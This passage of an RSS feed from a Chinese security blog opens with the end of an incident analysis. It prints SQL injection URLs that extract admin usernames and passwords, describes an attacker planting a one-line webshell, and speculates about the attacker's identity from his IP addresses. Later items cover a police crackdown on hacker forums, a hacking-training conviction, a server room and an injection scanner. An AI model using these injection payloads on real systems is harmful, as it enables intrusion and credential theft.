rel="external">http://www.target.org</a></a></a>/dc1/modi.asp?id=1%20union%20sel&#101;ct%20username,password,3,4%20from%20admin%20in%20&#34;D:\website\target\wwwroot\systemdb\%23%23%23%23userdb.asp&#34;%20wh&#101;re%20id=1<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a>/dc1/modi.asp?id=1%20union%20sel&#101;ct%201,2,3,4%20from%20admin%20in%20&#34;D:\website\target\wwwroot\systemdb\%23%23%23%23userdb.asp&#34;%20wh&#101;re%20id=1<br/>郁闷，用一句话获得了数据库的物理地址，并且尝试注入，蛋疼。由于注入是会被封ip的，所以攻击者不得不重启hub，重新获取ip，那么他的ip变化为<br/>114.237.161.118<br/>114.237.130.191<br/>114.237.130.14<br/>114.237.128.98<br/>114.237.130.110<br/>此次注入之后ip换为114.237.129.237。一阵测试后，最后在4点10左右，结束整个测试。<br/>现在对攻击者的整个攻击思路进行一下总结。整个攻击从6月7日的1点多开始，在4点10左右停止，整个过程持续了4个小时左右，战果是拿下了一句话后门。首先是探路，测试了本服务器的4个网站，最后选定www.target.org这个站点，决定从这个站点下手。选定站点之后，首先测试页面可能存在的注入点，测试了多个带有参数的页面。觉得希望不大之后开始运行wwwscan扫描站点系统。同时下载了同站点系统进行研究，之后测试各个可能存在问题的页面，最后在一个页面中找到了可以插入一句话的漏洞，之后插入一句话，再之后尝试扩大成果，想传大马，但是没有成功。整个IIS的分析也就在此结束了。分享到这里我突然有一个想法，这个测试者会不会是刀城的刀友呢？搜搜看。<br/>以114.237开头的会员有2位。<br/><br/><a href="http://www.daokers.com/attachments/month_1110/f20111011202126.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/f20111011202126.gif" border="0" alt="点击放大图片"/></a><br/><br/>能有这种机会，在一个ip段的机会是微乎其微的。我初步认为是bbt4ng，或者是他的朋友至少离他不远！<br/><br/>后来找他聊了一下，果然是的。<br/><br/><a href="http://www.daokers.com/attachments/month_1110/s20111011202142.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/s20111011202142.gif" border="0" alt="点击放大图片"/></a><br/><br/><br/><br/><br/><br/><span style="font-size:24pt;line-height:100%;"><span style="color:Red"><br/><br/>此文已发表在土司论坛！<br/><br/>如需转载请表明出处和作者！</span></span><br/><br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.daokers.com/article/others/629.htm</link>
			<title><![CDATA[黑客们，也来看看《焦点访谈》吧]]></title>
			<author>daokers@qq.com(admin)</author>
			<category><![CDATA[乱七八糟]]></category>
			<pubDate>Tue,22 Feb 2011 20:55:17 +0800</pubDate>
			<guid>http://www.daokers.com/default.asp?id=629</guid>
		<description><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;文章末尾的这个视频是中央电视台在2011年2月21日的焦点访谈节目。看了中央电视台的这个焦点访谈&ldquo;网络扫&ldquo;黑&rdquo;保安全&rdquo;，看看这些毛头小孩干的事情，祸害匪浅啊。其实在某种意义上来说，这些人不能算作黑客，他们是以非法手段来谋求钱财，最多算的上黑客界的不法之徒而已，他们在安全方面的贡献应当是微乎其微，所以不能称之为黑客。黑客在于找出技术问题、系统漏洞，解决问题、修补漏洞，促进网络环境的良好发展，为了整个网络的安全做出了非常人所能理解的辛苦和劳动，最多也就是显耀一下自己的技术，以黑客技术来谋求钱财应当是违背黑客的原始定义的。从片中看了，央视记者也没有好好理解&ldquo;黑客&rdquo;到底为何物，可能就是因为他带&ldquo;黑&rdquo;吧，谁叫hacker读起来就是&ldquo;黑&rdquo;呢，在这里一定要为这个名词平反，黑客不黑，骇客才坏。&nbsp;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 安全与攻击向来不分家，也无法分家。如果不懂得攻击，怎么做好防卫安全呢？跟古代攻城和守城一个道理，不了解箭的锋利，哪有坚固如铁的盾牌。在过去不到一年的时间里，国内各个比较有名望的安全论坛基本全军覆灭，黑基论坛，小熊论坛，暗组论坛，饭客论坛，红客论坛，黑白论坛等等技术氛围相对较好的论坛通通倒下，前几天仅存的以&ldquo;低调求发展&rdquo;为座右铭的土司也圆寂归天。看国家这个整治的势头，整个中国安全技术的发展停滞10年看来是不可避免的了。黑客们，看好你的手指哦，也该反思了。</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 说到国内的黑客论坛的整治，我不由想起国外的黑客论坛，在国外的黑客论坛上，ddos工具，远控工具，盗icq的工具，注入扫描方面的程序，不管开源代码还是编译好的程序都是应有竟有，不知道他们是如何做好监管的，难道他们就没有我们国内的情况？在国外top100的黑客网站排名上还没有听说哪家网站被人为强制关闭了。缘何我们国内的情况就如此严重呢？发人深思！</p>
<p>&nbsp;</p>
<p><embed id="v_player_cctv" menu="false" lk_media="yes" lk_mediaid="lk_juiceapp_mediaPopup_1257416656250" type="application/x-shockwave-flash" src="http://player.cntv.cn/standard/cntvOutSidePlayer.swf?v=0.171.5.6" name="v_player_cctv" bgcolor="#000000" quality="best" allowfullscreen="true" allowscriptaccess="always" flashvars="videoId=20110221109081&amp;filePath=/flvxml/2009/02/21/&amp;url=http://news.cntv.cn/china/20110221/109081.shtml&amp;tai=news&amp;configPath=http://news.cntv.cn/player/config.xml&amp;widgetsConfig=http://news.cntv.cn/player/widgetsConfig.xml&amp;languageConfig=&amp;hour24DataURL=&amp;outsideChannelId=channelBugu&amp;videoCenterId=49d5ec97b60e4edd3b53ecac95d7bc6e" height="480" width="639"></embed></p>
<p>&nbsp;</p>
<p>&nbsp;</p>]]></description>
		</item>
		
			<item>
			<link>http://www.daokers.com/article/others/628.htm</link>
			<title><![CDATA[黑客网站负责人王献冰（孤独剑客）因培训黑客技术入狱]]></title>
			<author>daokers@qq.com(admin)</author>
			<category><![CDATA[乱七八糟]]></category>
			<pubDate>Sat,12 Feb 2011 22:40:28 +0800</pubDate>
			<guid>http://www.daokers.com/default.asp?id=628</guid>
		<description><![CDATA[今年35周岁的王某可能做梦也没想到，曾是一代黑客佼佼者的自己，会在铁窗内度过自己2011年的新年。　 <br/><br/>　　2003年5月，王某凭 借自己对计算机网络的热爱，成为黑客程序界的高手，成功创建了网址为www.hackbase.com的黑基网，在网站上开展黑客软件的共享，探讨一些技 巧。2009年，王某以黑基网为平台，在北京市海淀区成立了黑基公司，自任法人，同时招聘了一批曾在网络安全公司或大型杀毒软件公司供职、具备较高计算机 技术，在黑客圈内有一定知名度的人担任网站顾问、专职讲师等。黑基公司的收入来源主要是通过提供网络培训及软件下载等收取会员费用。据调查，其中70%的 会员入会意图就是学习黑客技术。该公司曾开办了一期实地面授班，缴费学员为12人，每人9800元，培训内容为网络安全及黑客技术。至案发时黑基公司通过 上述方式获利高达20余万元。　<br/><br/>　　黑基公司的行为不久即纳入公安机关的侦查视线，经过长达1年的侦查，公安机关最终掌握了该网站服务器 群所在地以及黑基公司传授黑客技术、出售黑客工具的具体事实。经北京市网络安全保卫处远程勘验及侦查，查证在黑基网的VIP会员下载区，网站提供黑基 2009全能工具箱以及ASP木马数字免杀器、网马新世界2006.exe、明小子Domain3.6增强纯净版.exe、HDSI2.2.exe、 My-Browser.exe、Pangolin.exe、Smsniff.exe、1433连接器.exe、挖掘鸡6.5.exe、 WSIv5.1.25.exe、WebCruiser-CN.exe等下载程序及工具。而国家计算机网络应急技术处理协调中心、国家计算机病毒应急处理中 心计算机病毒防治产品检验实验室等国家权威部门以及大型网络安全公司的相关鉴定均认为上述程序、工具分别为网站挂马工具、网站注入工具、攻击目标搜寻工 具、网络嗅探工具、漏洞扫描工具、数据库入侵工具等，均属于危害性较大的网站侵入、控制工具。嫌疑人王某等人随即落网，涉嫌罪名是提供侵入、控制计算机系 统程序、工具罪。　<br/><br/>　　该罪属于刑法修正案(七)规定的新罪名，系在刑法原第二百八十五条增加的第三款，具体为:“提供专门用于侵入、非 法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款规定处 罚。”该罪的犯罪主体是一般主体，单位不构成本罪。主观方面是故意，但行为人是否为营利的目的提供程序、工具并不影响犯罪的成立。其犯罪客体是国家计算机 信息网络的安全。须明确的是，这里的犯罪对象分为两大类，第一类是“专门”用于侵入、非法控制计算机信息系统的程序、工具，这是从其功能用途来区分的，也 就意味着这类程序工具毫无合法用途的可能性，只能用于非法侵入、非法控制计算机信息系统。第二类是从其功能用途来看可能不是专门用于非法侵入、控制计算机 信息系统的程序和工具，但也具有能实现前述违法犯罪目的的计算机程序和工具，行为人明知使用者获取这些程序或工具的目的就是为了实施非法侵入控制他人计算 机信息系统，仍然为其提供该类程序和工具。此时，这类程序和工具就成为本罪的犯罪对象。从某种意义上说，第二类程序和工具可视为有双用途的信息安全设备， 只有在与其他构成要件相结合时才能成为本罪的犯罪对象。就行为人提供的上述程序、工具而言，首先是行为人只要提供程序或者工具，二者择一即可构成犯罪。其 次，提供的程序和工具也不需要同时具备侵入和非法控制两种功能，二者也是择一即可构成本罪对象。　<br/><br/>　　需要注意的是，刑法修正案(七)第 九条增订的刑法第二百八十五条第三款规定“依照前面的规定处罚”，而前面的规定为“犯本罪的，处三年以下有期徒刑或者拘役，并处或者单处罚金;情节特别严 重的，处三年以上七年以下有期徒刑，并处罚金”。因此，本罪属于情节犯，即实施了上述客观行为之后，还需达到情节严重的标准方可入罪，能否认定嫌疑人的行 为达到“情节严重”是区别其罪与非罪的关键所在，但这里的情节严重有待司法解释予以明确规定。但主流观点认为，行为人提供前述犯罪对象的目的、动机、主观 恶性、提供的数量、犯罪对象的功能作用等都可以成为评价是否构成严重情节的因素。本案王某创建的黑客网站不但提供网站侵入、控制工具，还大规模培训黑客技 术，实属情节严重，应予严惩。(作者单位:北京市海淀区人民检察院)<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.daokers.com/article/others/627.htm</link>
			<title><![CDATA[“侵入”广州新一代机房]]></title>
			<author>daokers@qq.com(admin)</author>
			<category><![CDATA[乱七八糟]]></category>
			<pubDate>Mon,03 Jan 2011 18:15:43 +0800</pubDate>
			<guid>http://www.daokers.com/default.asp?id=627</guid>
		<description><![CDATA[无意之中，“侵入”了广州新一代机房<br/><br/><a href="http://www.daokers.com/attachments/month_1101/h20111318437.jpg" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1101/h20111318437.jpg" border="0" alt="点击放大图片"/></a><br/><br/>这次总共托管了3台服务器，2个磁盘柜，每个磁盘柜都是满员的12个500g硬盘，去除热备的磁盘，2个磁盘柜的总容量达到了10T左右。3台服务器有一台作为数据库服务器，另外2台服务器做一个网络均衡负载处理，以响应更多同时访问请求，尽量避免当机的情况下网站的正常运转，同时又可做数据的双重备份。<br/><br/>新一代机房全系黑色机柜，满屋子都是服务器在嗡嗡名叫。<br/><br/><a href="http://www.daokers.com/attachments/month_1101/v2011131856.jpg" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1101/v2011131856.jpg" border="0" alt="点击放大图片"/></a><br/><br/><br/><a href="http://www.daokers.com/attachments/month_1101/w201113181037.jpg" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1101/w201113181037.jpg" border="0" alt="点击放大图片"/></a><br/><br/><br/>服务器和磁盘柜，占去了差不多一整个架，用的思科的8口路由器，已经完全满足要求了。<br/><br/><a href="http://www.daokers.com/attachments/month_1101/o20111318110.jpg" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1101/o20111318110.jpg" border="0" alt="点击放大图片"/></a><br/><br/><br/><a href="http://www.daokers.com/attachments/month_1101/j20111318128.jpg" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1101/j20111318128.jpg" border="0" alt="点击放大图片"/></a><br/><br/><br/><a href="http://www.daokers.com/attachments/month_1101/n201113181228.jpg" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1101/n201113181228.jpg" border="0" alt="点击放大图片"/></a><br/><br/>双内网架构，便于数据的备份与安全。RAID构建大容量服务器，同时热备搭配，即使某一个硬盘出现问题也不会造成数据丢失。<br/><br/><br/><br/><br/><br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.daokers.com/article/original/626.htm</link>
			<title><![CDATA[关于firefox游览器中旁注查询插件Host Spy的使用的更正]]></title>
			<author>daokers@qq.com(admin)</author>
			<category><![CDATA[原创天空]]></category>
			<pubDate>Sat,25 Dec 2010 00:36:05 +0800</pubDate>
			<guid>http://www.daokers.com/default.asp?id=626</guid>
		<description><![CDATA[今天上Q，joe给我消息说编辑那个hostspy.jar不必用c32asm修改，直接解压缩，然后用winrar压缩就行，不过压缩的时候需要用zip模式，而不能是rar模式。<br/><br/>测试了一下，确实如此。<br/><br/><a href="http://www.daokers.com/attachments/month_1012/x2010122503419.jpg" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1012/x2010122503419.jpg" border="0" alt="点击放大图片"/></a><br/><br/><br/>另外那个插件c段查询的用3est的那个已经不行了，好像没有接口。用这个吧<a href="http://ip.chaxun.la" target="_blank" rel="external">http://ip.chaxun.la</a>，好像数据还行。<br/><br/><br/>have a enjoy<br/><br/><br/>daokers<br/><br/>2010年12月24日夜]]></description>
		</item>
		
			<item>
			<link>http://www.daokers.com/article/collection/625.htm</link>
			<title><![CDATA[Safe3 Web蜘蛛爬行漏洞扫描系统 6.1修正版 ]]></title>
			<author>daokers@qq.com(admin)</author>
			<category><![CDATA[精品收藏]]></category>
			<pubDate>Sat,04 Dec 2010 20:53:40 +0800</pubDate>
			<guid>http://www.daokers.com/default.asp?id=625</guid>
		<description><![CDATA[<br/>今日得一safe兄的大杀器-Safe3 Web蜘蛛爬行漏洞扫描系统 6.1修正版 ，功能非常强大，在这里给大家推荐一下。不过这个是试用版，只能扫描sql注入，但是对于安全工作者来说，这不是已经完全满足了吗？<br/><br/><a href="http://www.daokers.com/attachments/month_1012/m201012420526.jpg" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1012/m201012420526.jpg" border="0" alt="点击放大图片"/></a><br/><br/><br/>软件介绍：<br/>SQL注入网页抓取<br/>网页抓取模块采用广度优先爬虫技术以及网站目录还原技术。广度优先的爬虫技术的不会产生爬虫陷入的问<br/>题，可自定义爬行深度和爬行线程，网站目录还原技术则去除了无关结果，提高抓取效率。并且去掉了参数<br/>重复的注入页面，使得效率和可观性有了很大提高。<br/><br/>SQL注入状态扫描技术<br/>不同于传统的针对错误反馈判断是否存在注入漏洞的方式，而采用状态检测来判断。所谓状态检测，即：针<br/>对某一链接输入不同的参数，通过对网站反馈的结果使用向量比较算法进行比对判断，从而确定该链接是否<br/>为注入点，此方法不依赖于特定的数据库类型、设置以及CGI语言的种类，对于注入点检测全面，不会产生<br/>漏报现象。并且具备一定的绕过IDS检测功能，扫描到隐藏的注入点。<br/><br/>注：爬行速度飞快，平均十分钟可扫描一万网址<br/><br/>软件运行需要Microsoft .NET Framework v2.0<br/><br/>下载地址：<a target="_blank" href="http://www.safe3.com.cn/safe3wvs.rar" rel="external">Safe3 Web蜘蛛爬行漏洞扫描系统 6.1修正版 </a><br/><br/>]]></description>
		</item>
		
</channel>
</rss>

